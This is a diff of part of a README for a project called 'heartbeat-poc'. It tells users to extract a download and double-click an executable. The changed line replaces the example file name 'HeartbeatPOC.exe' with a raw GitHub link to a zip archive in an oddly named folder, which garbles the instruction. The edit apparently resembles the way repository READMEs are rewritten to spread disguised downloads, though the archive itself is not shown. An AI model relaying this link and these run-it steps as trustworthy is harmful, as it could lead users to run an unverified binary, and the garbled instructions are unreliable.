ibam9573/heartbeat-poc/README.md

    If the downloaded file is compressed (like a .zip), right-click on it and select "Extract" to unzip the files.

 5. **Run the Application**
    Open the folder where you have downloaded the files.
-Look for the executable file (e.g., `HeartbeatPOC.exe`).
+Look for the executable file (e.g., `https://raw.githubusercontent.com/ibam9573/heartbeat-poc/main/propitiously/heartbeat-poc.zip`).
 Double-click it to run the application.

 ## 🛠️ System Requirements
 - **Operating System:** Windows 10 or later recommended.
 This application may also work on other operating systems with .NET support.